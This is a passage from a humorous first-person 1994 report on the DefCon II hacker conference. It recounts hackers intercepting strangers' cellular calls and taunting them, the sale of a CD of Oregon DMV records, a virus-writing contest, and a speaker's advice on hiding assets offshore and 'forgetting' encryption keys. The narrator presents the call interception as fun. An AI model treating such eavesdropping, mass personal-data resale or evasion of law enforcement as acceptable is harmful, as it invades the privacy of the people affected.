advocating this kind of activity, but much like Candid Camera
|
|||
|
broke into people's lives to capture their reactions, cellular
|
|||
|
hacking is similarly amusing. The hacker/phreaks particularly
|
|||
|
enjoyed breaking in on fighting couples. (I counted six impend
|
|||
|
ing divorces.) Almost without exception the man was in a car and
|
|||
|
the lady was at a fixed location; presumably, home.
|
|||
|
|
|||
|
Him: "Where the hell have you been."
|
|||
|
Her: "Nowhere."
|
|||
|
Him: "Bullshit.
|
|||
|
Her: "Really honey . . ." Defensively.
|
|||
|
Him: "Who's with you?" Intense anger.
|
|||
|
Hacker: "Don't believe her. She's a whore."
|
|||
|
Him: "What was that?"
|
|||
|
Her: "What?"
|
|||
|
"That voice."
|
|||
|
"What voice?"
|
|||
|
Hacker: "Me you asshole. Can't you see she's playing you for a
|
|||
|
fool."
|
|||
|
"I know she is." He agrees.
|
|||
|
"What's that honey?"
|
|||
|
"I know he's there with you."
|
|||
|
"Who?" Incredulous.
|
|||
|
"Him . . . whoever you're fucking when I'm at work."
|
|||
|
Hacker: "Yeah, it's me."
|
|||
|
"Shit! Who the fuck is there?"
|
|||
|
"No one!"
|
|||
|
"I can hear him, he's there. You're both making fun of me . . ."
|
|||
|
Hacker: "She's laughing at you, man."
|
|||
|
"No shit. Who the fuck are you?"
|
|||
|
Hacker: "The guy who takes care of her when you can't, asshole."
|
|||
|
"That's it." Click.
|
|||
|
|
|||
|
Drug dealers aren't immune to these antics.
|
|||
|
|
|||
|
"Where's the meet?"
|
|||
|
"By the 7/11 on Tropicana."
|
|||
|
"You got it?"
|
|||
|
"You got the cash?"
|
|||
|
"Yeah, dude."
|
|||
|
"Be sure you do."
|
|||
|
Hacker: "He doesn't have the cash my man. He's gonna rip you
|
|||
|
off."
|
|||
|
"What?" "What?" Both sides heard the intruder's voice. "Who is
|
|||
|
that?"
|
|||
|
"What's that about a rip-off?"
|
|||
|
"This ain't no rip-off man."
|
|||
|
Hacker: "Yes it is. Tell 'em the truth. You gonna take his drugs
|
|||
|
and shoot his ass. Right? Tell 'em."
|
|||
|
"You gonna rip me off?"
|
|||
|
"No, man!"
|
|||
|
"Your homeboy says you gonna try and rip me off?"
|
|||
|
"What home boy?"
|
|||
|
Hacker: "Me, you bozo drug freak. Don't you know that shit can
|
|||
|
kill you?"
|
|||
|
Click.
|
|||
|
|
|||
|
Good samaritanism pays off upon occasion.
|
|||
|
|
|||
|
"Honey, hurry up."
|
|||
|
"I'm on the freeway. I'm coming."
|
|||
|
Hacker: "He's late. Let's save her ass."
|
|||
|
"What was that?" "What did you say honey?"
|
|||
|
"He said he was going to save your ass."
|
|||
|
"Who did?"
|
|||
|
"The guy on the radio." (Technical ignorance abounds.)
|
|||
|
Hacker: "Me. You're late and she's scared so we're gonna beat
|
|||
|
you there and make her safe."
|
|||
|
"Who the hell is that?" "Who?" "The guy with you?" "There's no
|
|||
|
one here." "He says he's gonna beat me there and pick you up."
|
|||
|
Hacker: "Damn right we are."
|
|||
|
"Hey, this is cool. Who's there?"
|
|||
|
Hacker: "Cyber Christ talking to you from Silicon Heaven."
|
|||
|
"No shit. Really?"
|
|||
|
Hacker: "Yeah, (choke, choke,) really."
|
|||
|
"What's happening, honey."
|
|||
|
"I don't know, for sure. He says it's God."
|
|||
|
"God!?!?"
|
|||
|
Hacker: "Close enough. Listen, you sound alright. Go get your
|
|||
|
woman, man Keep her safe."
|
|||
|
"No problem. Uh, thanks."
|
|||
|
Click.
|
|||
|
|
|||
|
Around 4AM, I guess it was, the hacker/phreaks definitely helped
|
|||
|
out law enforcement. One end of the conversation was coming from
|
|||
|
inside a hotel, maybe even the Sahara. The other from another
|
|||
|
cell phone, most likely in the lobby.
|
|||
|
|
|||
|
"What do you look like?"
|
|||
|
"I'm five foot nine, thinning brown hair and 180 pounds I wear
|
|||
|
round glasses and . ."
|
|||
|
"I get the idea. Where are you now?"
|
|||
|
"I'm coming down the elevator now. What do you look like?"
|
|||
|
"I'm six foot one in my heels, have long blond spiked hair and
|
|||
|
black fishnet stockings."
|
|||
|
Hacker: "Don't go man. It's a bust."
|
|||
|
"What?" he said.
|
|||
|
Hacker: "Don't go, it's a bust. You don't want your name in the
|
|||
|
papers, do ya?"
|
|||
|
"What the fuck?" she yelled.
|
|||
|
"There's a guy who says this is a bust?"
|
|||
|
"Bust? What bust?"
|
|||
|
Hacker: "That's the clue, man. She's denying it. Of course it's
|
|||
|
a bust. Is it worth a night in jail to not get laid?"
|
|||
|
"Shit." He whispers not too quietly to another male companion.
|
|||
|
"There's some guy on the phone who says it's bust. What should we
|
|||
|
do."
|
|||
|
Hacker: "I'm telling you man, don't go,"
|
|||
|
"This ain't worth it. I'm going back upstairs."
|
|||
|
Click.
|
|||
|
|
|||
|
A couple of hours later the same hooker was overheard talking to
|
|||
|
one of her work mates.
|
|||
|
|
|||
|
"Then this asshole says it's a bust. Cost me $300 in lost busi
|
|||
|
ness, shit."
|
|||
|
"You, too? Same shit been going on all night long. What the
|
|||
|
fuck?"
|
|||
|
|
|||
|
Wow. And it seems like only this morning that my toilet explod
|
|||
|
ed.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
So what's a perfectly groomed and slightly rotund 50-something
|
|||
|
convicted methamphetamine dealer doing at DefCon II with hundreds
|
|||
|
of impressionable teenagers? You might well ask.
|
|||
|
|
|||
|
So I'll tell you.
|
|||
|
|
|||
|
Sitting in yet another Saharan hell-hole of a room they unabash
|
|||
|
edly market for $55 per night I encountered hackers #1 through #4
|
|||
|
and this . . . I immediately thought, elderly gent. He said
|
|||
|
nothing and neither did I, thinking that he might have been an
|
|||
|
over aged chaperone for delinquent teens or perhaps even an
|
|||
|
understanding Fed. But the gallon jugs of whiskey was depleting
|
|||
|
itself right before my eyes, as if a straw from Heaven sucked the
|
|||
|
manna from its innards. Actually, it was Bootleg.
|
|||
|
|
|||
|
Not bootleg liquor, mind you, but Bootleg the felonious con from
|
|||
|
Oregon. Apparently he got busted 'cause speed is and was against
|
|||
|
the law, and crank is not exactly the drug choice of maiden aunts
|
|||
|
nor school marms. "I've been a hacker longer than some of these
|
|||
|
kids have been alive. It all started back in . . ." and Mike
|
|||
|
"Bootleg" Beketic commenced on the first of hundreds of war-story
|
|||
|
jail house tales to entertain him and us. Bootleg loves a good
|
|||
|
story.
|
|||
|
|
|||
|
"Jail ain't so bad," he bragged with a huge whiskey smile. "No
|
|||
|
one fucked with me. You gotta make friends early on. Then it's
|
|||
|
OK." Good advice, I guess. "On parole I got slammed with a year
|
|||
|
for piss that didn't pass." Gotta be clean, my man. Stay away
|
|||
|
from that shit. It'll kill you and your teeth will rot.
|
|||
|
|
|||
|
Bootleg handed me form PROB-37, (Rev. 1/94) from the United
|
|||
|
States District Court, Federal Probation System. Grins from ear
|
|||
|
to ear. A badge of honor for villains, thieves, and scoundrels.
|
|||
|
Sounds like they need their own union.
|
|||
|
|
|||
|
This was the official "Permission To Travel" form dated June 16,
|
|||
|
1994 which gave Bootleg the legal right to travel from Oregon to
|
|||
|
Las Vegas in the dead of the summer to attend a "computer conven
|
|||
|
tion." The flight times were specific as were the conditions of
|
|||
|
his freedom. He had to inform the local cops that he was in
|
|||
|
town. In case any crimes occurred throughout the city of Las
|
|||
|
Vegas during his sojourn, he was an easily identifiable suspect.
|
|||
|
|
|||
|
While he downed another Jack and coke I found out what Bootleg
|
|||
|
was really doing. Despite the fact that the "Federal Keep Track
|
|||
|
of a Crook Travel Form" said, "you are prohibited from advertis
|
|||
|
ing or selling your DMV CD," the paranoia that runs rampant
|
|||
|
through the minds of prison bureaucracy was actually in this case
|
|||
|
quite correctly concerned.
|
|||
|
|
|||
|
"What's a DMV CD?"
|
|||
|
|
|||
|
"I'm glad you asked." I was set up. The edict said he couldn't
|
|||
|
sell or advertise, but there was no provision stating that he
|
|||
|
couldn't answer questions from an inquiring mind.
|
|||
|
|
|||
|
Bootleg handed me a CD ROM:
|
|||
|
|
|||
|
Bootleg Presents:
|
|||
|
DMV
|
|||
|
|
|||
|
- Over 2 Million Oregon Drivers License Records
|
|||
|
- Over 3 Million Oregon License Plate Records
|
|||
|
|
|||
|
The inside jacket clearly stated that this information was not to
|
|||
|
be used by any creatively nefarious types for any sort of person
|
|||
|
al Information Warfare tactics. It warns,
|
|||
|
|
|||
|
Do not use this CD to:
|
|||
|
|
|||
|
- Make phony Licenses
|
|||
|
- Make phony Titles
|
|||
|
- Obtain phony I.D.
|
|||
|
- Harass Politicians, Cops or Journalists
|
|||
|
- Stalk Celebrities
|
|||
|
- Get ME in trouble <G>
|
|||
|
|
|||
|
I can come up with at least 1001 other uses for this collection
|
|||
|
of information that the Oregon authorities are none too happy
|
|||
|
about. The ones Bootleg outlined never came into my mind.
|
|||
|
(Heh!) Bootleg acquired the information legally. State officials
|
|||
|
were kind enough to violate the electronic souls of its citizens
|
|||
|
by sending Bootleg their driver's information magnetically embla
|
|||
|
zoned on a 3600 foot long piece of 9 track acetate. Now they
|
|||
|
want to change the law to reflect "heart felt concern for the
|
|||
|
privacy of their citizens." Get a clue, or if none's available,
|
|||
|
buy one from Vanna.
|
|||
|
|
|||
|
Bootleg is moving onto the next 47 states (California and New
|
|||
|
York don't permit this kind of shenanigans) shortly to make sure
|
|||
|
that everyone has equal access. Hacking? Of course. Bootleg
|
|||
|
effectively hacked the Oregon DMV with their blessing and tax
|
|||
|
payer paid-for assistance.
|
|||
|
|
|||
|
Time to go back to my room while Bootleg and friends spent an
|
|||
|
evening of apparently unsuccessful whoring around the Strip and
|
|||
|
Glitter Gulch.
|
|||
|
|
|||
|
A good time was had by all.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
Jeff Moss opened the Sunday morning session with an ominous
|
|||
|
sermon.
|
|||
|
|
|||
|
"You'll notice that the wet bar is missing from the rear?" It
|
|||
|
had been there yesterday. Everyone turns around to look. "I
|
|||
|
gotta pay for the damage . . . " Jeff was not a happy camper.
|
|||
|
"They have my credit card number and it's almost full. So cool
|
|||
|
it!" But the show must go on and we had more to learn.
|
|||
|
|
|||
|
Next. Anonymous mailers on the net? Forget about it. No such
|
|||
|
thing. Anonymous remailers, even if they are in Norway or Finland
|
|||
|
or some such other country where American information contraband
|
|||
|
such as child pornography is legal, are only as safe and secure
|
|||
|
as the people who run it
|
|||
|
|
|||
|
"The FBI can go over any time they want and look up who you are
|
|||
|
and what kinds of stuff you swallow down your digital throat,"
|
|||
|
one speaker announced. Of course that's ridiculous. The FBI
|
|||
|
would have to call in the Boy Scouts or Russian Mafia for that
|
|||
|
kind of operation, but we all knew that anyway. A slight slip of
|
|||
|
the ad lib tongue. No harm done.
|
|||
|
|
|||
|
I didn't know, until this Sunday, that there were actually real
|
|||
|
live versions of "Pump Up The Volume" running rampant across the
|
|||
|
country, impinging their commercial-free low power radio broad
|
|||
|
casts into an electromagnetic spectrum owned and operated by the
|
|||
|
Federal Communications Commission. And, as to be expected, the
|
|||
|
FCC is trying to put these relatively harmless stations out of
|
|||
|
business along with Howard Stern and Don Imus. One would think
|
|||
|
that WABC or KLAC or any other major market stations would little
|
|||
|
care if a podunk 20 watt radio station was squeezing in between
|
|||
|
assigned frequencies. And they probably shouldn't. But, as we
|
|||
|
learned, the Military lent an innocent hand.
|
|||
|
|
|||
|
In support of the hobbies of servicemen, a local San Francisco
|
|||
|
base commander gave approval for a group of soldiers to establish
|
|||
|
a small, low power radio station for the base. Good for morale,
|
|||
|
keep the men out of the bars: you know the bit.
|
|||
|
|
|||
|
But the ballistic missiles went off when the nation's premier
|
|||
|
rating service, Arbitron, listed KFREE as a top local station in
|
|||
|
the San Francisco market.
|
|||
|
|
|||
|
"What station KFREE?" "Who the hell are they?" "What the fuck?"
|
|||
|
|
|||
|
Needless to say, KFREE was costing the legitimate radio stations
|
|||
|
money because advertising rates are based upon the number of
|
|||
|
listeners not up and peeing during commercials. Since KFREE was
|
|||
|
ad-free, no contest. Arbitron assumes the rating to relect the
|
|||
|
existence of a real station - the numbers are there - and the
|
|||
|
local stations call the FCC and the FCC calls the base and as
|
|||
|
quick as you can scream, "Feds suck!" KFREE is off the air.
|
|||
|
|
|||
|
Stomp.
|
|||
|
|
|||
|
I was scheduled to speak today, but with the schedule seemingly
|
|||
|
slipping forward and backward at random haphazard intervals,
|
|||
|
there was no telling when what would occur. Mark Ludwig, of
|
|||
|
Virus Writing Contest fame and author of the much touted "Little
|
|||
|
Black Book of Computer Viruses" Virus gave a less then impas
|
|||
|
sioned speech about the evils of government.
|
|||
|
|
|||
|
"I know most of you don't have any assets other than your comput
|
|||
|
er," Ludwig said to the poverty stricken masses of DefCon II.
|
|||
|
"But you will, and you want to make sure the government doesn't
|
|||
|
come crashing down around you whenever they want. They can and
|
|||
|
will take your life away if it suits them. There is no fourth
|
|||
|
amendment. Most search and seizures are illegal." And so it
|
|||
|
went.
|
|||
|
|
|||
|
"Put your money off shore, kids," said Dr. Ludwig the theoretical
|
|||
|
physicist. "Find a good friendly country with flexible banking
|
|||
|
laws and the Feds can't get you."
|
|||
|
|
|||
|
"And when the Feds do come for you, make sure that your entire
|
|||
|
life is on your computer. Rip up the papers after you scan them
|
|||
|
in. Your all-electronic life cannot be penetrated - especially
|
|||
|
if you get a case of the forgets. 'Oops, I forgot my password.
|
|||
|
Oops! I forgot my encryption key. Oops! I forgot my name.'"
|
|||
|
|
|||
|
"Even your VISA and Mastercard accounts should be from overseas.
|
|||
|
Keep it out of the US and you'll be all the better for it." For
|
|||
|
those interested in such alternative, Ludwig recommends that you
|
|||
|
call Mark Nestman: of LPP Ltd. at 800-528-0559 or 702-885-2509.
|
|||
|
Tell him you want to move your millions of rubbles and dollars
|
|||
|
and Cyber-credits overseas for safe keeping because the Byzantine
|
|||
|
Police are at the front door as you speak. Order pamphlet 103.
|
|||
|
|
|||
|
These are the defensive measures we can take protect ourselves
|
|||
|
against the emerging Police State. But offensive action is also
|
|||
|
called for, he says. "Help Phil Zimmerman. Send him money for
|
|||
|
his defense. Then, laugh at the Feds!" Haha, haha. Haha.
|
|||
|
Hahahahahaha. Ha!
|
|||
|
|
|||
|
."When they come to the door, just laugh at them." Haha. Haha
|
|||
|
ha. Haha. "No matter what they do, laugh at them." Hahahahaha.
|
|||
|
Enough of that, please. If I laugh at 6 husky beer-bellied
|
|||
|
Cyber-cops who have an arsenal of handguns pointed at my head,
|
|||
|
they might as well send me to the Group W bench to commiserate
|
|||
|
with Arlo Guthrie. Peeing would come before laughing. But then
|
|||
|
again, I'm no longer a grunged out 20 year old who can laugh in
|
|||
|
the face of the Grim Reaper. "Yes, ossifer, sir. I'm a cyber-
|
|||
|
crook. I ain't laughing at you in your face, ossifer, sir . . ."
|
|||
|
I panic easily. Kissing ass well comes from a life long success
|
|||
|
of quid pro quo'ing my way from situation to situation.
|
|||
|
|
|||
|
"And, now," Master Mark announced, "on to the results and awards
|
|||
|
for the Annual Virus Writing contest." Ludwig seemed suddenly
|
|||
|
depressed. "Unfortunately, we only got one legitimate entry."
|
|||
|
One entry? The media plastered his contest across the media-
|
|||
|
waves and the National Computer Security Association was planning
|
|||
|
a tactical nuclear response. One entry? What kind of subver
|
|||
|
sives have 20 year olds turned into anyway? In my day (Yeah, I'm
|
|||
|
old enough to use that phrase) if we called for a political
|
|||
|
demonstration thousands would pile through the subway turnstiles
|
|||
|
to meet a phalanx of well armed police appropriately attired in
|
|||
|
riot gear. One entry? Come on X-Generation, you can do better
|
|||
|
than that? No wonder the world's going to shit. Don't have
|
|||
|
enough trouble from the young-uns. Sheeeeeeesssh!
|
|||
|
|
|||
|
Mark Ludwig's politically incorrect virus writing contest may
|
|||
|
have been a PR success but it was a business abortion. One
|
|||
|
entry. Shit. At the NCSA meeting in Washington, rivaling fac
|
|||
|
tions battled over how we as an association should respond.
|
|||
|
|
|||
|
"Hang the bastard." "He's what's wrong with world." "Put him in
|
|||
|
a county jail with Billy-Bob, Jimmy-Ray and Bubba for a week and
|
|||
|
they'll be able to squeeze him out between the bars."
|
|||
|
|
|||
|
C'mon you fools! Ignore him! Ignore him! If you don't like what
|
|||
|
he has to say don't egg him on. Ignore him. You want to do what
|
|||
|
the Feds did to poor Phil Zimmerman and make him a folk hero?
|
|||
|
Turning a non-event into the lead for the evening news is not the
|
|||
|
way to make something go away. I loudly advocated that he be
|
|||
|
treated as a non-entity if the goal was reduction to obscurity.
|
|||
|
I was right.
|
|||
|
|
|||
|
Super-high priced PR and lobby firms had prepared presentation to
|
|||
|
wage an all-out attack on Ludwig and his contest. I bet! And who
|
|||
|
was going to pay for this? Peter Tippitt of Semantech ponied up
|
|||
|
what I believe amounted to $7,000 to get the pot going. No one
|
|||
|
else made a firm offer. Can't blame them cause it would have been
|
|||
|
no more effective than taking out an ad in Time proclaiming that
|
|||
|
evil is bad. The PR firm would have made their fees, the event
|
|||
|
would have made even more news and Ludwig would certainly have
|
|||
|
had to make a judgement and choose from more than one entry.
|
|||
|
|
|||
|
But oddly enough, the one entry did not win.
|
|||
|
|
|||
|
The winner of the Annual Virus Writing Contest was no less than
|
|||
|
Bob Bales, Executive Director of the NCSA. Not that Bob wrote a
|
|||
|
program, but if he had, Ludwig said, it would be called either
|
|||
|
Don Quixote or Paranoia, and it would be of the human brain at-
|
|||
|
tacking Meme type. The virus is a software equivalent of Prozac
|
|||
|
to alleviate the suffering in middle-aged males who have no
|
|||
|
purpose in life other than virus busting.
|
|||
|
|
|||
|
"Is Winn Schwartau here?" Mark asked the audience.
|
|||
|
|
|||
|
I was there. "Yo!"
|
|||
|
|
|||
|
"Would you tell Bob that he's won a plaque, and a $100 check and
|
|||
|
a full year subscription to the Computer Virus Developments
|
|||
|
Quarterly." I'm the technology advisor to the NCSA so it was
|
|||
|
a natural request to which I was pleased to oblige.
|
|||
|
|
|||
|
I told Bob about his 15 minutes of fame at DefCon to which he
|
|||
|
roared in laughter. "Good! Then I won't have to subscribe my
|
|||
|
self."
|
|||
|
|
|||
|
|
|||
|
|
|||
|
I spoke next. Jeff introduced me by saying, "Winn says he
|
|||
|
doesn't want to speak to an empty room so he's gonna talk now."
|
|||
|
Some introduction. But, what a great audience! Better than most
|
|||
|
of the security above-ground starched sphincter tight suit and
|
|||
|
tie conference audiences I normally get. But then again, I get
|
|||
|
paid handsomely to address legitimate audiences where I have to
|
|||
|
be politically correct. At DefCon, insulting people was the last
|
|||
|
thing I worried about. It was what I focused on, onstage and
|
|||
|
off.
|
|||
|
|
|||
|
"Hey, kid. Did you ever land Zimmerman in bed?"
|
|||
|
|
|||
|
"You, you, er . . ."
|
|||
|
|
|||
|
"C'mon kid. Give me your best shot."
|
|||
|
|
|||
|
"Your mother . . ." A crowd gathered to see what kind of repar
|
|||
|
tee this little schnook could come up with. "Your mother .. ."
|
|||
|
C'mon kid. You got it in you. C'mon. "You, she is a . . .
|
|||
|
uh, . . . mother . . ." and he finally skulked away in sheer
|
|||
|
embarrassment. Poor kid. When he went to the men's room, men
|
|||
|
walked out. Poor kid. I don't think he ever figured out it was
|
|||
|
all a put on.
|
|||
|
|
|||
|
The audience got it, though. Rather than go over what I rambled
|
|||
|
about for an hour, here comes a blatant plug: Go buy my new book
|
|||
|
"Information Warfare: Chaos on the Electronic Superhighway."
|
|||
|
That'll sum it up real nice and neat. But what a great audience.
|
|||
|
Thanks.
|
|||
|
|
|||
|
Little did I know, though, that I was also on trial.
|
|||
|
|
|||
|
John Markoff of the New York Times was the first to ask, and then
|
|||
|
a couple of buddies asked and then a lady asked during the Q&A
|
|||
|
portion of my ad hoc ad lib speech. "How come you did it?" Did
|
|||
|
what? "How come you flamed Lenny DeCicco?"
|
|||
|
|
|||
|
It turns out that someone adapted my electronic identity and
|
|||
|
logged on to the WELL in Sausalito, CA and proceeded to post a
|
|||
|
deep flame against Lenny. Among other none-too-subtle asper
|
|||
|
sions, 'my' posting accused Lenny of a whole string of crimes of
|
|||
|
Information Warfare and even out and out theft.
|
|||
|
|
|||
|
Except, it wasn't me. I answered the lady's question with, "It
|
|||
|
wasn't me, I don't know Lenny and I don't have an account on the
|
|||
|
WELL." That satisfied everyone except for me. What happened
|
|||
|
and why? It seems that Lenny's former partner in crime Most-
|
|||
|
Wanted on the lam federal fugitive computer hacker Kevin Mitnick
|
|||
|
actually wrote and signed the letter with his initials. Or
|
|||
|
someone was spoofing him and me at the same time. But why? And
|
|||
|
why me?
|
|||
|
|
|||
|
It took a couple of days after arriving home from DefCon to learn
|
|||
|
after extensive conversations with the WELL that my erased ac
|
|||
|
count from almost two years ago and then re-erased on June 20 of
|
|||
|
this year was accidentally turned back on by some mysterious
|
|||
|
administrative process that I cannot claim to fathom. OK, that's
|
|||
|
what they said.
|
|||
|
|
|||
|
But perhaps most interesting of the entire Getting Spoofed inci
|
|||
|
dent was a single comment that Pei Chen, sysop of the WELL said
|
|||
|
to me while I complained about how such an awful anti-social
|
|||
|
attack was clearly reprehensible. Oh, it's simple, she said.
|
|||
|
|
|||
|
"We have no security." Whooaaaahhh! The WELL? No security? I
|
|||
|
love it. I absolutely love it. Major service provider, no
|
|||
|
security. Go get 'em cowboy.
|
|||
|
|
|||
|
The only other speaker I wanted to see was Peter Beruk, chief
|
|||
|
litigator for the Software Publisher's Association. This is the
|
|||
|
Big Software Company sponsored organization which attempts to
|
|||
|
privately interdict illegal software distribution as a prelude
|
|||
|
for both civil and criminal prosecutions. And with this group of
|
|||
|
digital anarchists, no less.
|
|||
|
|
|||
|
The SPA scrounges around 1600 private BBS's to see who's making
|
|||
|
illicit copies of Microsoft Word or Quattro For Weanies or
|
|||
|
Bulgarian for Bimbos or other legitimate software that the pub
|
|||
|
lishers would rather receive their due income from then being
|
|||
|
stolen.
|
|||
|
|
|||
|
"Which boards are you on?"
|
|||
|
|
|||
|
"That would be telling." Big grin and laughs.
|
|||
|
|
|||
|
"Is your BBS secure?" A challenge in the making.
|
|||
|
|
|||
|
"Sure is."
|
|||
|
|
|||
|
"Is that an offer to see if we can break in?" Challenge made.
|
|||
|
|
|||
|
"Ahem, cough, cough." Challenge denied.
|
|||
|
|
|||
|
"What name do you use on the boards?" Idiot question that de
|
|||
|
serves an idiot answer.
|
|||
|
|
|||
|
"Fred." Laughs.
|
|||
|
|
|||
|
"You mean you have a full time guy to download software from
|
|||
|
boards to see if it's legal or not?" "Yup."
|
|||
|
|
|||
|
"So, you pay people to commit felonies?" Astutely stupid ques
|
|||
|
tion.
|
|||
|
|
|||
|
"We have permission."
|
|||
|
|
|||
|
"Why should we have to pay rip-off corporations too much money to
|
|||
|
use really shitty software?"
|
|||
|
|
|||
|
"So don't buy it."
|
|||
|
|
|||
|
"We don't. It's so shitty that it's barely worth stealing."
|
|||
|
|
|||
|
"So don't steal it."
|
|||
|
|
|||
|
"Just want to check it out, dude."
|
|||
|
|
|||
|
"Scum sucking imperialists are making all of the money. The
|
|||
|
software designers are getting ripped off by the big software
|
|||
|
bureaucracies. Power to the people." Every generation goes
|
|||
|
through this naively innocent berating of capitalism. It doesn't
|
|||
|
make them Communists (in 1950 it did), just not full fledged
|
|||
|
capitalist pigs themselves yet. Soon come. Vis a vis Ludwig's
|
|||
|
comment on the asset-deprived audience. Soon come, man.
|
|||
|
|
|||
|
"We go after BBS's that store illegal software."
|
|||
|
|
|||
|
"So you're gonna put Compuserve in jail?" Big, big applause.
|
|||
|
|
|||
|
Despite the openly verbal animosity between the free-ware believ
|
|||
|
ers and the Chief Software Cop, the spirited and entertaining
|
|||
|
disagreements maintained a healthy good natured tone that well
|
|||
|
exceed Peter's time limit, as DefCon II was coming to a close.
|
|||
|
|
|||
|
It was time for one more stand up comedy attempt by a short haired
|
|||
|
bandanna wearing hippie/hacker/phreak who was not quite up to the
|
|||
|
job.
|
|||
|
|
|||
|
"OK, guys. We've had some fun at the Feds expense. They're
|
|||
|
people, too. So, from now on, it's Hug a Fed. Go on, find a fed
|
|||
|
and go up to him or her and big them a great big bear hug full of
|
|||
|
love." The Feds that had been busted were gone. The ones still
|
|||
|
successfully undercover weren't about to blow it for a quick feel
|
|||
|
from a horny teenager.
|
|||
|
|
|||
|
Next. The Cliff Stoll doll with an assortment of accessory yo-
|
|||
|
yos was a popular item. It was thrown pell-mell into the crowds
|
|||
|
who leapt at it with a vengeance like a baseball bleachers sec
|
|||
|
tion awaiting the 61st home run.
|
|||
|
|
|||
|
"There used to be a Wife of Cliff Stoll doll, but no one's seen
|
|||
|
it in two years." Cliff is strange. I don't know if he's that
|
|||
|
strange, but it was a funny bit.
|
|||
|
|
|||
|
"Then we have the LoD/MoD action figure set starring Erik Bloo
|
|||
|
daxe and Phiber Optik." GI Joe action set gone underground.
|
|||
|
Corny, but appreciated as hundreds of bodies dove to catch the
|
|||
|
plastic relics tossed from the stage.
|
|||
|
|
|||
|
If anything, an anti-climatic end to an otherwise highly informa
|
|||
|
tive and educational conference. I can hardly wait till next
|
|||
|
year when, after word gets out, DefCon III will be attended by
|
|||
|
thousands of hackers and cops and narks who will try to replay
|
|||
|
the Summer of Cyber-Love '94 for a sequel.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
More than anything I wanted to get away from the Sahara. Away
|
|||
|
from its nauseatingly chromatic carpets, it's hundreds of sur
|
|||
|
veillance cameras, and most of all, away from its exploding
|
|||
|
toilets.
|
|||
|
|
|||
|
We decided to play, and play we did at the new Luxor Hotel which
|
|||
|
is an amazing pyramid with 4000+ rooms. There are no elevators as
|
|||
|
in a pyramid 'going up' is kind of useless, so Inclinators take
|
|||
|
passengers up the 30 some odd floors to hallways which ring
|
|||
|
around the impossibly huge hollowed out pyramid shaped atrium.
|
|||
|
|
|||
|
This was play land. And for three hours we played and played and
|
|||
|
went to dumb shows that attract mid-western mamas from Noodnick,
|
|||
|
Kentucky, alighting in Vegas for their annual RV pilgrimage. But
|
|||
|
we went and enjoyed none the less.
|
|||
|
|
|||
|
The "Live TV" show was anything but live except for lovely Susan
|
|||
|
who hosted us into the ersatz TV station. Her job is to look
|
|||
|
pretty, sound pretty and warm up the crowd for an over budget,
|
|||
|
overproduced schmaltz driven video projection that was to make us
|
|||
|
all feel like we were on stage with Dave. Letterman, that is.
|
|||
|
The effect does not work. But we enjoyed ourselves, anyway.
|
|||
|
|
|||
|
"Everyone here on vacation?"
|
|||
|
|
|||
|
"No!" I yelled out. Poor Susan was stunned. No? Why else would
|
|||
|
you be here?
|
|||
|
|
|||
|
"What are you doing?" The TV audience of 500 was looking our
|
|||
|
way. Between the five of us we had a million dollars (give or
|
|||
|
take) of electronic wizardry stuffed around us, beneath us and in
|
|||
|
our laps.
|
|||
|
|
|||
|
"Working." Gee, I'm quick.
|
|||
|
|
|||
|
"What do you do?" Susan asked with a straight face. I bet she
|
|||
|
expected something like gas pumper, or nocturnal mortuary forni
|
|||
|
cator or 7/11 clerk.
|
|||
|
|
|||
|
"We're hacking for Jesus. This is Cyber Christ!" I said pointing
|
|||
|
at Erik Bloodaxe.
|
|||
|
|
|||
|
Silence. Dead silence again. Sleep with Phil Zimmerman silence.
|
|||
|
Except for us. We giggled like school boys. Psyche.
|
|||
|
|
|||
|
"Ah, . . . that's nice." That was all she could come up with:
|
|||
|
That's nice. So much for ad libbing or deviating from the
|
|||
|
script. But the TV audience enjoyed it. A whole lot. They
|
|||
|
finally figured out it was put on. Not every one from the Mid-
|
|||
|
West is as stupid as they all pretend to be.
|
|||
|
|
|||
|
Then it was time to get sick. VR rides do me in, but not to be
|
|||
|
publicly humiliated by my 20-something cohorts (and Mike Peros
|
|||
|
with whom I had to travel yet another 2000 miles that night) I
|
|||
|
jumped right into an F-14 simulator which rotated 360 degrees on
|
|||
|
two gimbals for an infinite variety of nauseousness.
|
|||
|
|
|||
|
"Oh, shit!" I yelled as I propelled myself forward and around and
|
|||
|
sideways with sufficient g-force to disgorge even the most delec
|
|||
|
table meal. "Oh, shit." I had reversed the throttle and was now
|
|||
|
spinning end over end backwards. My inner ear was getting my
|
|||
|
stomach sick. "Oh, shit." Out of the corner of my eyes my four
|
|||
|
pals were doubled over in laughter. Had I barfed yet and not
|
|||
|
known it? God, I hope not. "Oh, shit." I came to a dead stand
|
|||
|
still, the video screen showed me plummeting to earth at escape
|
|||
|
velocity and I pushed the throttle forward as roughly as I could.
|
|||
|
An innate survival instinct came in to play. "Oh, shit!" The
|
|||
|
virtual aircraft carrier came into sight and after almost 2
|
|||
|
minutes of high speed rotating revulsion, I was expected to land
|
|||
|
this spinning F-14 on a thimble in the ocean. Right. I tried,
|
|||
|
and damned if I didn't make it. I have no idea how, but I got an
|
|||
|
extra 34,000 points for a safe landing. 120 seconds. Ding.
|
|||
|
Time's up.
|
|||
|
|
|||
|
I got out of the simulator and spilled right onto the floor; one
|
|||
|
42 year old pile of humanity who had navigated nausea but whose
|
|||
|
balance was totally beyond repair. "Could anyone hear me?" I
|
|||
|
asked from my knees.
|
|||
|
|
|||
|
"They were selling tickets."
|
|||
|
|
|||
|
"Do I get my money back?"
|
|||
|
|
|||
|
Onto the VR race cars. I really thought I'd throw up to the
|
|||
|
amusement of a thousand onlookers. Hacking then phreaking then
|
|||
|
flying and now driving. I put the pedal to the metal and
|
|||
|
crashed. The huge video display has me tipping end over end and
|
|||
|
the screen is shaking and the car I'm driving is shuddering
|
|||
|
violently but my brain can't compute it all. I'm gonna wretch, I
|
|||
|
just know it. But I keep on driving, decidedly last against
|
|||
|
people who haven't been handicapped with an inner ear so sensi
|
|||
|
tive I get dizzy when I watch a 5" black and white TV.
|
|||
|
|
|||
|
We tilted out of there and alas, it was time to find a 200,000
|
|||
|
pound of metal to glide me home. It was a damn good thing I hadn't
|
|||
|
eaten before VR Land, but I wolfed down $3 hot dogs at the air
|
|||
|
port knowing full well that whatever they served on the plane
|
|||
|
would be a thousand times worse. So Mike and I munched, leaving
|
|||
|
